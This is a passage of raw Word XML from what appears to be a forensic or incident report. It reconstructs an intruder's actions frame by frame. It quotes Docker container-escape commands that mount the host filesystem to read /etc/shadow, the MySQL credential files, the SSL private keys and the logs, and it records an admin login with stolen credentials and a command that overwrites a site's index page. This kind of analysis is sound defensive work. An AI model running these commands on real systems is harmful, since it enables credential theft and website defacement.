      <w:r w:rsidR="3EF9ECF0" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>813</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:2</w:t>
      </w:r>
      <w:r w:rsidR="6FBBBE0E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4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4A4E72DA" w14:textId="5717C8C8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</w:t>
      </w:r>
      <w:r w:rsidR="5C6D1298" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker run --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="5C6D1298" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rm  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="5C6D1298" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="5C6D1298" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5C6D1298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5C6D1298" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5C6D1298"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="5C6D1298" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5C6D1298" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="5C6D1298" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5C6D1298" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="7DF3A6B1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gets the normal cat result for this file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62221951" w14:textId="3803B736" w:rsidR="7DF3A6B1" w:rsidRDefault="7DF3A6B1" w:rsidP="1DD92F8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Now the “root” and “dev” users have passwords defined</w:t>
      </w:r>
      <w:r w:rsidR="00CB00C7" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DC626" w14:textId="57F7E605" w:rsidR="72852CFA" w:rsidRDefault="72852CF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</w:t>
      </w:r>
      <w:r w:rsidR="2DC188D4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>823</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:2</w:t>
      </w:r>
      <w:r w:rsidR="5DB4DDE2" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4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3C8A81C5" w14:textId="0A949A3E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</w:t>
      </w:r>
      <w:r w:rsidR="7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker run --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rm  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="7078269A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7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="7078269A"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="7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt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etc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mysql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debian.cnf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt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etc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mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="7078269A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>my.cnf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="5FF43953" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gets nothing in return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852D071" w14:textId="382A7EB8" w:rsidR="72852CFA" w:rsidRDefault="72852CF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</w:t>
      </w:r>
      <w:r w:rsidR="519B44E0" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>833</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:2</w:t>
      </w:r>
      <w:r w:rsidR="5DB4DDE2" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4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25E5BA10" w14:textId="2E0C7209" w:rsidR="72852CFA" w:rsidRDefault="72852CF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</w:t>
      </w:r>
      <w:r w:rsidR="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker run --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rm  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4BB8E09E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4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4BB8E09E"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="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="4BB8E09E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/private/\\*</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="4B13803A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gets nothing in return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520B59A" w14:textId="0D261A6A" w:rsidR="4B13803A" w:rsidRDefault="4B13803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24843 – 19:24 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB6A06" w14:textId="6C77D70F" w:rsidR="4B13803A" w:rsidRDefault="4B13803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“docker run --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rm  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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Pr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/var/log/\\*” and gets nothing in return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BB7308" w14:textId="5F7ED855" w:rsidR="4B13803A" w:rsidRDefault="4B13803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24853 – 19:2</w:t>
      </w:r>
      <w:r w:rsidR="0A5DC5D0" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5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7CDA9E37" w14:textId="4F305B72" w:rsidR="4B13803A" w:rsidRDefault="4B13803A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Sends command “</w:t>
      </w:r>
      <w:r w:rsidR="50194229" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker run --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="50194229" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rm  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="50194229" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="50194229" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="50194229"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="50194229" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="50194229" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat /var/lib/docker/containers/1bc8170248006261556c8e9316704cdef21d3ea03d5ebdca439a4043dfb15b25/1bc8170248006261556c8e9316704cdef21d3ea03d5ebdca439a4043dfb15b25-json.log</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” and gets nothing in return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DBBAD7" w14:textId="30903A67" w:rsidR="4B13803A" w:rsidRDefault="4B13803A" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000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</w:t>
      </w:r>
      <w:r w:rsidR="7F07C5F5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5008</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:2</w:t>
      </w:r>
      <w:r w:rsidR="4770B42A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F65BDA" w14:textId="5CB4E5CE" w:rsidR="07A79033" w:rsidRDefault="07A79033" w:rsidP="1DD92F8E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Uses the credentials obtained </w:t>
      </w:r>
      <w:r w:rsidR="1C821BFC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n frame</w:t>
      </w:r>
      <w:r w:rsidR="51943C24" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="51943C24" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7294 </w:t>
      </w:r>
      <w:r w:rsidR="51943C24" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to login </w:t>
      </w:r>
      <w:r w:rsidR="00BD0FD6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>into the website</w:t>
      </w:r>
      <w:r w:rsidR="0D82EBB9" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as admin</w:t>
      </w:r>
      <w:r w:rsidR="00BD0FD6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA2DBF6" w14:textId="31F13430" w:rsidR="46C26E6C" w:rsidRDefault="46C26E6C" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1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25108 – 19:27 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4231701F" w14:textId="15DE9D8C" w:rsidR="20327CC3" w:rsidRDefault="20327CC3" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">While logged in as admin, </w:t>
      </w:r>
      <w:r w:rsidR="2B7A4383" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">successfully </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>uploads a new picture to the website (bg.png).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6716F3C3" w14:textId="160743D1" w:rsidR="1D7C4726" w:rsidRDefault="1D7C4726" w:rsidP="1DD92F8E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1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="55BA95F3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is present on the first page of th</w:t>
      </w:r>
      <w:r w:rsidR="28C40DE6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722411C6" w14:textId="0ABEA871" w:rsidR="6B122380" w:rsidRDefault="6B122380" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr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25310 – 19:27 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216DBC0" w14:textId="6E1E8911" w:rsidR="6B122380" w:rsidRDefault="6B122380" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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Sends command “echo "&lt;body </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bgcolor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="black"&gt;&lt;center&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>="/static/gallery/bg.png"&gt;&lt;/center&gt;&lt;/body&gt;" &gt; /app/templates/index.html”, with the intent to replace the index page w</w:t>
      </w:r>
      <w:r w:rsidR="3256D2EF" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ith </w:t>
      </w:r>
      <w:r w:rsidR="0BC6E146" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">another page </w:t>
      </w:r>
      <w:r w:rsidR="3256D2EF" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wi</w:t>
      </w:r>
      <w:r w:rsidR="7E51648D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>th only their image</w:t>
      </w:r>
